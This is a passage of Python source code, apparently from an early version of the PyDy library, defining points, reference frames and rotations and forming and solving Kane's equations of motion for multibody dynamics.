relative to the Newtonian Frame, taking into account whether points\n have been declared as fixed in a frame or not.\n\n Used with arguments, .vel(point, frame) returns the velocity of self\n relative to point, as view by an observer fixed in frame.\n \"\"\"\n\n v = Vector(0)\n if point == frame == None:\n if hasattr(self, 'abs_vel'):\n return self.abs_vel\n else:\n for p in self.point_list:\n v += p._vrel\n elif isinstance(point, Point) and isinstance(frame, ReferenceFrame):\n # Get the point list from point to self\n point_list = point.get_point_list(self)\n for i, pa in enumerate(point_list[:-1]):\n pb = point_list[i+1]\n set_intersect = pa._fixedin & pb._fixedin\n # Case when the two points are not fixed in the same frame\n if len(set_intersect) == 0:\n v += dt(pb.rel(pa), frame)\n # Case when the two points are fixed in the same frame\n elif len(set_intersect) == 1:\n v += cross(set_intersect.pop().ang_vel(frame),\n pb.rel(pa))\n else:\n raise NotImplementedError('Somehow these two points are \\\n both fixed in 2 or more of the same frames')\n return v\n\n def get_point_list(self, other=None):\n \"\"\"\n Gets the list of Points between Point self and Point other, including both.\n \"\"\"\n if other == None:\n return self.point_list\n elif self == other:\n return [self]\n else:\n r2t = list(reversed(other.point_list))\n\n if len(self.point_list) == 1:\n return r2t\n elif len(r2t) == 1:\n return self.point_list\n\n r1t = list(reversed(self.point_list))\n i = 1\n\n while r1t[i] == r2t[i]:\n del r1t[i-1]\n del r2t[i-1]\n if len(r1t)<2 or len(r2t)<2:\n break\n\n r1t.reverse()\n return r1t[:-1] + r2t\n\n def __str__(self):\n return '' % self.name\n\n def __repr__(self):\n return '' % self.name\n\nclass ReferenceFrame(object):\n \"\"\"\n A standard reference frame with 3 mutually perpendicular unit vectors.\n Reference frames can be created in two ways:\n\n Method 1:\n A = ReferenceFrame('A')\n\n Method 2:\n B = A.rotate('B', axis, angle)\n where:\n axis = 1, 2 or 3\n angle is the radian measure of the rotation.\n\n Method 1 typically is used to create the 'base' frame from which all other\n frames are derived. Method 2 is used to create all subsequent frames. In\n doing so, circular definitions of frames are avoided and a tree structure\n of reference frames is created. The first argument is a string and\n determines how the basis UnitVectors are printed.\n \"\"\"\n\n def __init__(self, s, matrix=None, frame=None, omega=None):\n \"\"\"\n If instantiated without the optional arguments, the 'base'\n ReferenceFrame is created. The optional arguments are automatically\n generated by the rotate() method for the purpose of creating a new\n ReferenceFrame object. See rotate() method for details of the optional\n arguments.\n \"\"\"\n self.children = []\n self.name = s\n self.triad = [UnitVector(self, i) for i in (1,2,3)]\n self.transforms = {}\n self.parentframe = frame\n self.torque = Vector(0)\n\n if not any([matrix, frame, omega]):\n self.ref_frame_list = [self]\n self.O = Point(s + 'O', fixedinframe=self)\n self.point_list = [self.O]\n self.NewtonianReferenceFrame = self\n self.uv_dot_products = {}\n self.uv_cross_products = {}\n self.inertia = Inertia(self, (0,0,0,0,0,0))\n else:\n self.ref_frame_list = [self] + frame.ref_frame_list[:]\n self.NewtonianReferenceFrame = frame.NewtonianReferenceFrame\n\n if isinstance(omega, Vector):\n self._wrel = omega\n frame._wrel_children[self] = -omega\n elif isinstance(omega, tuple):\n # Case of simple rotations about 1 axis\n self._wrel = Vector(omega[1] * self.triad[omega[0]-1])\n frame._wrel_children[self] = Vector(-omega[1] *\n self.triad[omega[0]-1])\n else:\n self._wrel = Vector(0)\n\n self._wrel_children = {}\n\n\n if frame is not None:\n frame.children.append(self)\n self.append_transform(frame, matrix)\n frame.append_transform(self, matrix.T)\n\n def __getitem__(self, i):\n \"\"\"\n Reference the UnitVectors that are attached to a reference frame.\n Example:\n A = ReferenceFrame('A')\n\n A[1], A[2], A[3] are the three basis vectors of the A frame.\n \"\"\"\n if i == 1 or i == 2 or i ==3:\n return self.triad[i-1]\n else:\n raise NotImplementedError()\n\n def append_transform(self, frame, matrix):\n \"\"\"\n Appends 'matrix' to the transforms dict which transform vectors\n expressed in self basis vectors to the basis vectors of the frame\n 'frame'\n \"\"\"\n # We just append it to our \"transforms\" dict.\n self.transforms[frame] = matrix\n\n def rotate(self, name, axis, angle, I=None, I_frame=None):\n \"\"\"Returns a new rotated reference frame.\n\n Perform simple rotations, Euler rotations, space fixed rotations, axis\n angle rotations, Euler parameter rotations, or Rodrigues parameter\n rotations.\n\n Perform a simple rotation about the 1, 2, or 3 axis, by an amount\n specified by angle, to create a new ReferenceFrame object.\n Automatically generates the angular velocity of the new frame with\n respect to the parent frame.\n\n Currently the orientation is stored as the direction cosine matrix,\n further work should implement quaternions. Extra functionality such as\n the ability to specify a set of Euler angles or an arbitrary axis and\n angle needs to be implemented.\n\n When rotate is used to generate a new ReferenceFrame, the orientation\n of that reference frame relative to its parent reference frame is\n stored in both frames in the form of the direction cosine matrix.\n Additionally, the angular velocity of the new reference frame relative\n to the parent frame (and vice versa) is stored with the new reference\n frame (and the parent reference frame).\n \"\"\"\n\n if not isinstance(angle, (list, tuple)):\n if axis in set((1, 2, 3)):\n matrix = self._rot(axis, angle)\n omega = (axis, angle.diff(t))\n elif axis in set((-1, -2, -3)):\n matrix = self._rot(-axis, -angle)\n omega = (-axis, -angle.diff(t))\n elif isinstance(axis, (UnitVector, Vector)):\n raise NotImplementedError(\"Axis angle rotations not \\\n implemented.\")\n else:\n raise ValueError(\"Invalid axis\")\n newframe = ReferenceFrame(name, matrix, self, omega)\n self[abs(axis)].common_frames.add(newframe)\n newframe[abs(axis)].common_frames.add(self)\n if I == None and I_frame==None:\n newframe.inertia = Inertia(newframe, (0, 0, 0, 0, 0, 0))\n elif I != None and I_frame != None:\n newframe.inertia = Inertia(I_frame, I)\n elif I != None and I_frame == None:\n newframe.inertia = Inertia(newframe, I)\n else:\n raise NotImplementedError()\n return newframe\n else:\n if len(angle) == 3:\n csqrd_dict = {cos(angle[0])**2:1-sin(angle[0])**2,\\\n cos(angle[1])**2:1-sin(angle[1])**2,\\\n cos(angle[2])**2:1-sin(angle[2])**2}\n rot_type = str(axis)\n if rot_type in set(('BODY123', 'BODY132', 'BODY231', 'BODY213',\n 'BODY312', 'BODY321', 'BODY121', 'BODY131', 'BODY232',\n 'BODY212', 'BODY313', 'BODY323', 'SPACE123', 'SPACE132',\n 'SPACE231', 'SPACE213', 'SPACE312', 'SPACE321', 'SPACE121',\n 'SPACE131', 'SPACE232', 'SPACE212', 'SPACE313', 'SPACE323')):\n if rot_type[0] == 'B': # Body fixed (Euler) angles\n a1 = int(rot_type[4])\n a2 = int(rot_type[5])\n a3 = int(rot_type[6])\n C = self._rot(a1, angle[0]) * self._rot(a2, angle[1]) * \\\n self._rot(a3, angle[2])\n else: # Space fixed angles\n a1 = int(rot_type[5])\n a2 = int(rot_type[6])\n a3 = int(rot_type[7])\n C = self._rot(a3, angle[2]) * self._rot(a2, angle[1]) * \\\n self._rot(a1, angle[0])\n # From Spacecraft Dynamics, by Kane, Likins, Levinson\n # Eqns 1.10.(5-7), pg. 47\n # Angular velocity components in new frame's basis vectors\n\n w1 = (C[0,2]*(C[0,1].diff(t)) + C[1,2]*(C[1,1].diff(t)) + \\\n C[2,2]*(C[2,1].diff(t))).expand().subs(csqrd_dict).expand()\n\n w2 = (C[1,0]*(C[1,2].diff(t)) + C[2,0]*(C[2,2].diff(t)) + \\\n C[0,0]*(C[0,2].diff(t))).expand().subs(csqrd_dict).expand()\n\n w3 = (C[2,1]*(C[2,0].diff(t)) + C[0,1]*(C[0,0].diff(t)) + \\\n C[1,1]*(C[1,0].diff(t))).expand().subs(csqrd_dict).expand()\n\n\n # First initialize with zero angular velocity\n newFrame = ReferenceFrame(name, C, self, Vector({}))\n # Angular velocity vector of newFrame relative to self\n omega = Vector({newFrame[1]: w1, newFrame[2]: w2,\n newFrame[3]: w3})\n newFrame.set_omega(omega, self, force=True)\n if I == None and I_frame==None:\n newFrame.inertia = Inertia(newFrame, (0, 0, 0, 0, 0, 0))\n elif I != None and I_frame != None:\n newFrame.inertia = Inertia(I_frame, I)\n elif I != None and I_frame == None:\n newFrame.inertia = Inertia(newFrame, I)\n else:\n raise NotImplementedError()\n return newFrame\n else:\n raise NotImplementedError(\"angle must be a list/tuple of \\\n length 3\")\n\n def _rot(self, axis, angle):\n \"\"\"Returns direction cosine matrix for simple 1,2,3 rotations\n\n \"\"\"\n if axis == 1:\n return Matrix([[1, 0, 0],\n [0, cos(angle), -sin(angle)],\n [0, sin(angle), cos(angle)]])\n elif axis == 2:\n return Matrix([[cos(angle), 0, sin(angle)],\n [0, 1, 0],\n [-sin(angle), 0, cos(angle)]])\n elif axis == 3:\n return Matrix([[cos(angle), -sin(angle), 0],\n [sin(angle), cos(angle), 0],\n [0, 0, 1]])\n\n def __str__(self):\n return '' % self.name\n\n def __repr__(self):\n return \"\" % self.name\n\n def get_frames_list(self, frame):\n \"\"\"\n Returns a list of frames from \"self\" to \"frame\", including both.\n\n Example::\n\n N - A - D - E - F\n \\\n B - C\n\n Then:\n\n C.get_frames_list(F) == [C, B, A, D, E, F]\n F.get_frames_list(C) == [F, E, D, A, B, C]\n \"\"\"\n if self == frame:\n return [self]\n else:\n r2t = list(reversed(frame.ref_frame_list))\n\n if len(self.ref_frame_list) == 1:\n return r2t\n elif len(r2t) == 1:\n return self.ref_frame_list\n\n r1t = list(reversed(self.ref_frame_list))\n i = 1\n while r1t[i] == r2t[i]:\n del r1t[i-1]\n del r2t[i-1]\n if len(r1t)<2 or len(r2t)<2:\n break\n\n r1t.reverse()\n return r1t[:-1] + r2t\n\n def apply_torque(self, torque, other=None, reset=False):\n \"\"\"Apply torque to a reference frame or rigid body.\n\n Can be used to apply a torque to a reference frame or rigid body.\n\n Repeated calls to apply_torqe are additive.\n\n If optional argument other is specified, a torque or equal magnitude\n but opposite sign will applied to the other reference frame.\n\n If you need to reset the applied torque to zero, use optional parameter\n reset=True\n \"\"\"\n if other==None:\n if reset==False:\n self.torque += Vector(torque)\n elif reset==True:\n self.torque = Vector(torque)\n else:\n raise TypeError('reset must be a boolean')\n elif isinstance(other, ReferenceFrame):\n if reset==False:\n torque = Vector(torque)\n self.torque += torque\n other.torque -= torque\n elif reset==True:\n torque = Vector(torque)\n self.torque = torque\n other.torque = -torque\n else:\n raise TypeError('reset must be a boolean')\n else:\n raise TypeError('other must be a ReferenceFrame')\n\n def get_rot_matrices(self, frame):\n \"\"\"\n Returns a list of matrices to get from self to frame.\n # local function\n def shrink(rm_list):\n new_list = []\n for i, rm in enumerate(rm_list[:-1]):\n rmn = rm_list[i+1]\n # All true if simple rotation about 1 axis\n cmp1 = [rm[0,0]==rmn[0,0], rm[0,1]==rmn[0,1], rm[0,2]==rmn[0,2],\n rm[1,0]==rmn[1,0], rm[2,0]==rmn[2,0]]\n # All true if simple rotation about 2 axis\n cmp2 = [rm[0,1]==rmn[0,1], rm[1,0]==rmn[1,0], rm[1,1]==rmn[1,1],\n rm[1,2]==rmn[1,2], rm[2,1]==rmn[2,1]]\n # All true if simple rotation about 3 axis\n cmp3 = [rm[0,2]==rmn[0,2], rm[1,2]==rmn[1,2], rm[2,0]==rmn[2,0],\n rm[2,1]==rmn[2,1], rm[2,2]==rmn[2,2]]\n if all(cmp1):\n # create the matrix\n break\n elif all(cmp2):\n # create the matrix\n break\n elif all(cmp3):\n # create the matrix\n break\n new_list.append(rm)\n \"\"\"\n\n frames = self.get_frames_list(frame)\n if frames == [self]:\n return [eye(3)]\n result = []\n for i, f in enumerate(frames[:-1]):\n result.append(f.transforms[frames[i+1]])\n result.reverse()\n return result\n\n def set_omega(self, omega, frame, force=False):\n \"\"\"Sets the angular velocity relative to another frame.\n \"\"\"\n if self._wrel == Vector(0) or force:\n self._wrel = omega\n #if self.W == {} or force:\n # self.W[frame] = omega\n else:\n raise ValueError(\"set_omega has already been called.\")\n\n def ang_vel(self, frame=None):\n \"\"\"Angular velocity relative to another frame.\n \"\"\"\n\n if frame == self:\n return Vector(0)\n else:\n if frame == None:\n if hasattr(self, 'abs_ang_vel'):\n return self.abs_ang_vel\n else:\n frame = self.NewtonianReferenceFrame\n elif frame == self.NewtonianReferenceFrame and hasattr(self,\n 'abs_ang_vel'):\n return self.abs_ang_vel\n\n om = Vector(0)\n fl = frame.get_frames_list(self)\n n = len(fl)\n for i, f in enumerate(fl[:-1]):\n if f == fl[i+1].parentframe:\n om += fl[i+1]._wrel\n else:\n om -= fl[i]._wrel\n return om\n\n def ang_acc(self, frame=None):\n \"\"\"Angular acceleration relative to another frame.\n \"\"\"\n\n if frame == self:\n return Vector(0)\n else:\n if frame == None: frame = self.NewtonianReferenceFrame\n if hasattr(self, 'abs_ang_acc'):\n return self.abs_ang_acc\n else:\n alpha = Vector(0)\n fl = frame.get_frames_list(self)\n n = len(fl)\n for i, f in enumerate(fl[:-1]):\n if f == fl[i+1].parentframe:\n alpha += fl[i+1]._alpharel\n else:\n alpha -= fl[i]._alpharel\n return alpha\n\n def get_omega_list(self, frame):\n \"\"\"\n Returns a list of simple angular velocities from self to frame.\n \"\"\"\n frames = self.get_frames_list(frame)\n if frames == [self]:\n return [Vector({})]\n result = []\n for i, f in enumerate(frames[:-1]):\n #result.append(f.W[frames[i+1]])\n result.append(f._wrel)\n return result\n\nclass NewtonianReferenceFrame(ReferenceFrame):\n \"\"\"A Newtonian Reference Frame class.\n\n Includes a dextral set of UnitVectors and an origin:\n\n >>> from pydy import *\n >>> N = NewtonianReferenceFrame('N')\n >>> N[1]\n n1>\n >>> N[2]\n n2>\n >>> N[3]\n n3>\n >>> N.O\n \n >>>\n \"\"\"\n def __init__(self, s):\n ReferenceFrame.__init__(self, s)\n # Holonomic constraint equations\n self.hc_eqns = []\n # Differentiatated holonomic constraint equations\n self.dhc_eqns = []\n # Nonholonomic constraint equations\n self.nhc_eqns = []\n self.symbol_dict = {}\n self.symbol_dict_back = {}\n self.trig_func_set = set([])\n self.cos_func_set = set([])\n self.sin_func_set = set([])\n self.tan_func_set = set([])\n self.csqrd_dict = {}\n self.crossterms = set([])\n\n def setkindiffs(self, eqn_list):#, dependent_speeds=None, acc=True):\n \"\"\"Set the kinematic differential equations of the system.\n\n Must be given as a list of Relational objects.\n\n \"\"\"\n self.kindiffs = eqn_list\n\n\n def setdyndiffs(self, eqns):\n \"\"\"\n Sets the dynamic equations of motion.\n \"\"\"\n self.dyndiffs = eqns\n\n def recursive_subs(self, PorF, expr_dict):\n # Substitute into appropriate velocity/angular velocity\n if isinstance(PorF, Point):\n PorF._vrel = PorF._vrel.subs(expr_dict)\n elif isinstance(PorF, ReferenceFrame):\n PorF._wrel = PorF._wrel.subs(expr_dict)\n else:\n raise NotImplementedError()\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_subs(child, expr_dict)\n\n def recursive_partials(self, PorF):\n \"\"\"Recursively form the relative partial velocities of each point and\n partial angular velocity of each reference frame.\n \"\"\"\n # Substitute into appropriate velocity/angular velocity\n if isinstance(PorF, (Point, ReferenceFrame)):\n if isinstance(PorF, Point): pv = PorF.vel().partials(self.u_list)\n if isinstance(PorF, ReferenceFrame): pv = PorF.ang_vel().partials(self.u_list)\n if hasattr(self, 'u_dependent') and len(self.u_dependent) != 0:\n pv_i = [pv[i] for i in self.independent_ci]\n pv_d = Matrix([pv[i] for i in self.dependent_ci]).T\n # Maybe should use a dummy matrix instead of\n # u_dependent_transform... then back substitute once final\n # equations are derived.\n con = matrixv_multiply(pv_d, self.T_con).tolist()[0]\n PorF.partialv = [pv_i[i] + con[i] for i in range(len(con))]\n else:\n # Case when the system has no constraints\n PorF.partialv = pv\n else:\n raise NotImplementedError\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_partials(child)\n\n def declare_coords(self, string, number, list=True):\n \"\"\"Declare the generalized coordinates and their time derivatives.\n \"\"\"\n q_list, qdot_list = gcs(string, number, list)\n self.q_list = q_list\n self.qdot_list = qdot_list\n # Generate lists of Symbol objects instead of Function objects\n self.csqrd_dict = {}\n self.tan_dict = {}\n self.cot_dict = {}\n for q in q_list:\n self.csqrd_dict[cos(q)**2] = 1 - sin(q)**2\n self.tan_dict[sin(q)/cos(q)] = tan(q)\n self.cot_dict[cos(q)/sin(q)] = cot(q)\n self.q_list_s = [Symbol(str(q.func)) for q in q_list]\n sin_q_list = [sin(qs) for qs in self.q_list]\n cos_q_list = [cos(qs) for qs in self.q_list]\n tan_q_list = [tan(qs) for qs in self.q_list]\n trig_q_list = sin_q_list + cos_q_list + tan_q_list\n sin_q_list_s = [Symbol('s'+str(qs)[1:]) for qs in self.q_list_s]\n cos_q_list_s = [Symbol('c'+str(qs)[1:]) for qs in self.q_list_s]\n tan_q_list_s = [Symbol('t'+str(qs)[1:]) for qs in self.q_list_s]\n trig_q_list_s = sin_q_list_s + cos_q_list_s + tan_q_list_s\n self.qdot_list_s = [Symbol(str(q.func)+'d') for q in q_list]\n self.q_list_dict = dict(zip(q_list, self.q_list_s))\n self.q_list_dict_back = dict(zip(self.q_list_s, q_list))\n trig_q_dict = dict(zip(trig_q_list, trig_q_list_s))\n trig_q_dict_back = dict(zip(trig_q_list_s, trig_q_list))\n\n self.qdot_list_dict = dict(zip(qdot_list, self.qdot_list_s))\n self.qdot_list_dict_back = dict(zip(self.qdot_list_s, qdot_list))\n # Update the comprehensive symbol dictionaries\n for d in (self.q_list_dict, self.qdot_list_dict):\n self.symbol_dict.update(d)\n for d in (self.q_list_dict_back, self.qdot_list_dict_back):\n self.symbol_dict_back.update(d)\n self.trig_subs_dict = trig_q_dict\n self.trig_subs_dict_back = trig_q_dict_back\n return q_list, qdot_list\n\n def declare_speeds(self, string, number, lst=True):\n \"\"\"Declare the generalized speeds and their time derivatives.\n \"\"\"\n u_list, udot_list = gcs(string, number, lst)\n self.u_list = u_list\n self.udot_list = udot_list\n self.u_independent = u_list\n self.u_dependent = []\n self.udot_independent = udot_list\n self.udot_dedependent = []\n self.independent_ci = list(range(len(u_list)))\n self.dependent_ci = []\n\n # Generate lists of Symbol objects instead of Function objects\n self.u_list_s = [Symbol(str(u.func)) for u in u_list]\n self.udot_list_s = [Symbol(str(u.func)+'p') for u in u_list]\n\n # Generate a set of cross terms\n for ui in u_list:\n for uj in u_list:\n self.crossterms.update(set([ui*uj]))\n for qd in self.qdot_list:\n self.crossterms.update(set([ui*qd]))\n for qd_i in self.qdot_list:\n for qd_j in self.qdot_list:\n self.crossterms.update(set([qd_i*qd_j]))\n self.crossterms = list(self.crossterms)\n self.crossterms.sort()\n # Generate substitution dictionaries between Symbol and Function\n # representation of the coordinates, generalized speeds, and their\n # respective time derivatives\n self.u_list_dict = dict(zip(u_list, self.u_list_s))\n self.u_list_dict_back = dict(zip(self.u_list_s, u_list))\n self.udot_list_dict = dict(zip(udot_list, self.udot_list_s))\n self.udot_list_dict_back = dict(zip(self.udot_list_s, udot_list))\n\n for d in (self.u_list_dict, self.udot_list_dict):\n self.symbol_dict.update(d)\n for d in (self.u_list_dict_back, self.udot_list_dict_back):\n self.symbol_dict_back.update(d)\n\n return u_list, udot_list\n\n def declare_parameters(self, string):\n \"\"\"Declare the parameters (constants) of the system.\n \"\"\"\n self.parameter_list = symbols(string)\n return self.parameter_list\n\n def set_motion_constraint_matrix(self, T_con, T_con_dt, u_dep, u_indep,\n d_ci, i_ci):\n \"\"\"Set the motion constraint matrix and it's time derivative.\n\n Returns two substitution dictionaries, one for each matrix.\n \"\"\"\n m, n = T_con.shape\n assert (m, n) == T_con_dt.shape\n T_con_dict = {}\n T_con_dt_dict = {}\n T_con_sym = zeros((m, n))\n T_con_dt_sym = zeros((m, n))\n for i in range(m):\n for j in range(n):\n tconij = Symbol('T_con%d%d'%(i,j))\n tcondtij = Symbol('T_con%d%dd'%(i,j))\n T_con_dict[tconij] = T_con[i, j]\n T_con_dt_dict[tcondtij] = T_con_dt[i, j]\n T_con_sym[i, j] = tconij\n T_con_dt_sym[i, j] = tcondtij\n self.T_con = T_con_sym\n self.T_con_dt = T_con_dt_sym\n\n # Set the dependent and independent speeds\n self.u_dependent = u_dep\n self.u_independent = u_indep\n self.udot_dependent = [ud.diff(t) for ud in u_dep]\n self.udot_independent = [ui.diff(t) for ui in u_indep]\n self.dependent_ci = d_ci\n self.independent_ci = i_ci\n\n return T_con_dict, T_con_dt_dict\n\n def frstar(self, subs_dict=None):\n \"\"\"Computes the generalized inertia forces of the system.\n \"\"\"\n n = len(self.u_list)\n # p == n in systems where no dependent speeds have been introduced\n p = len(self.u_independent)\n # m == 0 in systems where no dependent speeds have been introduced\n m = len(self.u_dependent)\n self.mass_matrix = zeros((p, p))\n # When dependent speeds are used, the mass matrix must be formed\n # carefully, taking into account the transformation matrix between the\n # independent and the independent speeds:\n # M_i * d(u_i)/dt + M_d * d(u_d)/dt + ... + Fr = 0\n # M_i * d(u_i)/dt + M_d * (d(T_ud)/dt * u_i + T_ud * d(u_i)/dt) + ... + Fr = 0\n # (M_i + M_d * T_ud) * d(u_i)/dt + M_d * d(T_ud)/dt * u_i + ... + Fr = 0\n if m != 0:\n self.mass_matrix_i = zeros((p, p))\n self.mass_matrix_d = zeros((p, m))\n\n self.recursive_frstar(self.O, subs_dict=subs_dict)\n self.recursive_frstar(self, subs_dict=subs_dict)\n\n def recursive_frstar(self, PorF, subs_dict=None):\n \"\"\"Recursively computes generalized inertia forces for each particle\n and rigid body in the system.\n\n Generalized inertia forces will be linear in the time derivatives of\n the generalized speeds and the gyroscopic terms of the form u_j*u_k.\n As such, when computing the generalized inertia forces it makes sense\n to collect all like terms, so that simplifications on each of the\n coefficients of these linear terms can be simplified individually.\n\n We store these coefficients as a Matrix of length: n + (n**2+n)/2.\n Where n is the number of generalized speeds (both dependent and\n independent). The (n**2 + n)/2 comes from the numer of unique possible\n gyroscopic terms. The coefficients are ordered from u1,..., un, while\n the gyroscopic terms are ordered according to the ordering of the\n \"crossterms\" attribute.\n \"\"\"\n # List of d(u_i)/dt, u_i * u_j, and u_i * qd_j terms. The acceleration\n # of every point is linear in all these terms.\n udgyro_list = self.udot_list + self.crossterms\n n = len(self.udot_list)\n m = len(self.u_dependent)\n p = len(self.u_independent)\n assert isinstance(PorF, (ReferenceFrame, Point))\n if isinstance(PorF, Point) and PorF.mass == 0:\n PorF.gen_inertia_force = [(0, 0)] * p\n elif isinstance(PorF, ReferenceFrame) and PorF.inertia.dict == {}:\n PorF.gen_inertia_force = [(0, 0)] * p\n else:\n PorF.gen_inertia_force = []\n # Compute the generalized inertia forces\n if isinstance(PorF, Point):\n acc = PorF.abs_acc\n inertia_force = {}\n for k, v in acc.dict.items():\n inertia_force[k] = -PorF.mass * v\n inertia_force = Vector(inertia_force).expandv()\n else:\n alph = PorF.ang_acc()\n I = PorF.inertia\n w = PorF.ang_vel()\n #inertia_force = (-alph.dot(I)-w.cross(I.rdot(w))).expandv()\n inertia_force = (-dot(I, alph) - cross(w, dot(I, w))).expandv()\n\n # If subs_dict was passed to form_kanes_equations, substitute it\n # here:\n if subs_dict:\n inertia_force = inertia_force.subs(subs_dict)\n # List of coefficients of all linear terms\n coef_list = inertia_force.partials(udgyro_list)\n # Loop through all partial velocities / partial angular velocites\n for i, pv in enumerate(PorF.partialv):\n sum_ud = 0\n sum_gyro = 0\n coef_list_d_pv = []\n for c in coef_list:\n coef_list_d_pv.append(c.dot(pv))\n if n == p: # Case for no motion constraints\n for j, udot in enumerate(udgyro_list[:p]):\n self.mass_matrix[i, j] += coef_list_d_pv[j]\n sum_ud += coef_list_d_pv[j] * udot\n for j, gyro in enumerate(udgyro_list[p:]):\n sum_gyro += coef_list_d_pv[j+p] * gyro\n PorF.gen_inertia_force.append((sum_ud, sum_gyro))\n else: # Case for systems with motion constraints\n mm_row = zeros((1, p+m))\n mm_i_row = zeros((1, p))\n mm_d_row = zeros((1, m))\n for j in range(p):\n mm_row[j] += coef_list_d_pv[j]\n for j, jt in enumerate(self.dependent_ci):\n mm_d_row[j] = mm_row[jt]\n for j, jt in enumerate(self.independent_ci):\n mm_i_row[j] = mm_row[jt]\n\n # Normal gyroscopic terms that appear in GIF's\n for j, gyro in enumerate(udgyro_list[p:]):\n sum_gyro += coef_list_d_pv[j+p] * gyro\n # Extra gyroscopic terms that appear in GIF's due to\n # constraints\n sum_gyro += (mm_d_row * self.T_con_dt * Matrix(self.u_independent))[0]\n\n # Mass matrix, constrained\n mm_con = mm_i_row + mm_d_row*self.T_con\n sum_ud = (mm_con * Matrix(self.udot_independent))[0]\n self.mass_matrix[i, :] += mm_con\n PorF.gen_inertia_force.append((sum_ud, sum_gyro))\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_frstar(child, subs_dict=subs_dict)\n\n def fr(self):\n \"\"\"Computes the generalized active forces of the system.\n \"\"\"\n self.recursive_fr(self.O)\n self.recursive_fr(self)\n\n def recursive_fr(self, PorF):\n \"\"\"Recursively computes generalized active forces for each particle\n and rigid body in the system.\n \"\"\"\n if isinstance(PorF, Point):\n if PorF.force == Vector(0):\n PorF.gen_active_force = [0] * len(self.u_independent)\n else:\n PorF.gen_active_force = [PorF.force.dot(pv) for pv in\n PorF.partialv]\n elif isinstance(PorF, ReferenceFrame):\n if PorF.torque == Vector(0):\n PorF.gen_active_force = [0] * len(self.u_independent)\n else:\n PorF.gen_active_force = [PorF.torque.dot(pw) for pw in\n PorF.partialv]\n else:\n raise NotImplementedError()\n\n # Initiate recursion\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_fr(child)\n\n def gravity(self, v):\n \"\"\"Applies a gravitational force to each particle and rigid body in the\n system.\n \"\"\"\n v = Vector(v)\n self.recursive_gravity(self.O, v)\n\n def recursive_gravity(self, Point, v):\n \"\"\"Recursively apply gravity to all points which have been assigned a\n nonzero mass.\"\"\"\n\n gf = {}\n for k in v.dict:\n gf[k] = Point.mass * v.dict[k]\n Point.force += Vector(gf)\n # Initiate recursion\n if Point.children == []:\n return\n else:\n for child in Point.children:\n self.recursive_gravity(child, v)\n\n def form_kanes_equations(self, subs_dict=None):\n \"\"\"Forms Kanes equations in a slightly modified form.\n\n Rather than returning:\n Fr + Fr* = 0\n\n It returns a list of equations which have the udot's on the left hand\n side and everything else on the opposite side.\n \"\"\"\n # Form Partial Velocities and Partial Angular velocities for every\n # Point and Reference Frame\n self.recursive_partials(self)\n self.recursive_partials(self.O)\n # Compute the generalized active forces\n self.fr()\n # Compute the generalized inertia forces\n self.frstar(subs_dict=subs_dict)\n p = len(self.u_independent)\n self.kanes_equations = []\n self.ke_lhs = [0] * p\n self.ke_rhs_if = [0] * p\n self.ke_rhs_af = [0] * p\n ke = []\n for i in range(p):\n self.kanes_equations.append([0,0])\n self.recursive_eoms(self.O)\n self.recursive_eoms(self)\n for i in range(p):\n s = S(0)\n for j, ud in enumerate(self.udot_independent):\n c_ud = self.mass_matrix[i, j]\n if c_ud != 0:\n s += c_ud * ud\n self.ke_lhs[i] = s\n s = S(0)\n for uu in self.crossterms:\n c_uu = self.ke_rhs_if[i].coeff(uu)\n if c_uu is not None:\n s += c_uu * uu\n self.ke_rhs_if[i] = s\n af = factor(self.ke_rhs_af[i].subs(self.trig_subs_dict).\\\n subs(self.symbol_dict)).subs(self.symbol_dict_back).\\\n subs(self.trig_subs_dict_back)\n ke.append(Eq(self.ke_lhs[i], self.ke_rhs_if[i] + af))\n self.kanes_equations = ke\n return ke\n\n def set_kanes_equations(self, eqns):\n self.kanes_equations = eqns\n\n def solve_kanes_equations(self, dummy_vars=None):\n \"\"\"Solves Kane's equations for the time derivatives of the generalized\n speeds.\n\n Forms the adjugate matrix, factors out common terms along the rows,\n performs the matrix multiplication, and then multiplies by the common\n terms and divides by the determinant.\n\n If optional dummy_mass_matrix argument is eqaul to True, returns the\n result with dummy symbols, and a dictionary with the dummy symbols as\n keys and the expression they represent as the corresponding values.\n \"\"\"\n m, n = self.mass_matrix.shape\n assert m == n\n mm, mm_dict = dummy_matrix(self.mass_matrix, 'M')\n ke_rhs, ke_dict = dummy_matrix(Matrix([ke.rhs for ke in\n self.kanes_equations]), 'rhs')\n mm_dict.update(ke_dict)\n assert ke_rhs.shape == (n, 1)\n\n # Form the adjugate and the determinant\n mm_adj = mm.adjugate().expand()\n for i in range(m):\n for j in range(n):\n if mm_adj[i, j] != 0:\n mm_adj[i, j] = factor(mm_adj[i, j])\n mm_det = factor(mm.det(method=\"berkowitz\").expand())\n assert mm_det != 0, \"Mass matrix is singular!!!\"\n\n soln = []\n # Try to factor each row\n for i in range(m):\n row = mm_adj[i,:]\n row_bool = [False] * n\n for j, entry in enumerate(row):\n if isinstance(entry, Mul) or entry == 0:\n row_bool[j] = True\n if all(row_bool): # All factored or are zero\n flag = 0\n for entry in row:\n if entry == 0:\n continue\n elif flag == 0:\n flag = 1\n row_factor = set(entry.args)\n else:\n row_factor &= set(entry.args)\n if row_factor:\n f = Mul(*list(row_factor))\n row /= f\n else:\n f = 1\n soln.append( (f / mm_det) * ((row * ke_rhs)[0]))\n else:\n soln.append( (1 / mm_det) * ((row * ke_rhs)[0]))\n\n dyndiffs = []\n for i, udot in enumerate(self.udot_independent):\n rhs = soln[i]\n if dummy_vars == None:\n rhs = rhs.subs(mm_dict).expand()\n dyndiffs.append(Eq(udot, rhs))\n\n if dummy_vars:\n return dyndiffs, mm_dict\n else:\n return dyndiffs\n\n def recursive_eoms(self, PorF):\n \"\"\"Traverse Point and ReferenceFrame tree and sum the generalized\n inertia forces and generalized active forces.\n \"\"\"\n for r in range(len(self.u_independent)):\n # Term on the left hand side of Fr* = -Fr\n self.kanes_equations[r][0] += PorF.gen_inertia_force[r][0]\n # Term on the right hand side of Fr* = -Fr\n self.kanes_equations[r][1] -= PorF.gen_active_force[r] + PorF.gen_inertia_force[r][1]\n self.ke_lhs[r] += PorF.gen_inertia_force[r][0]\n self.ke_rhs_if[r] -= PorF.gen_inertia_force[r][1]\n 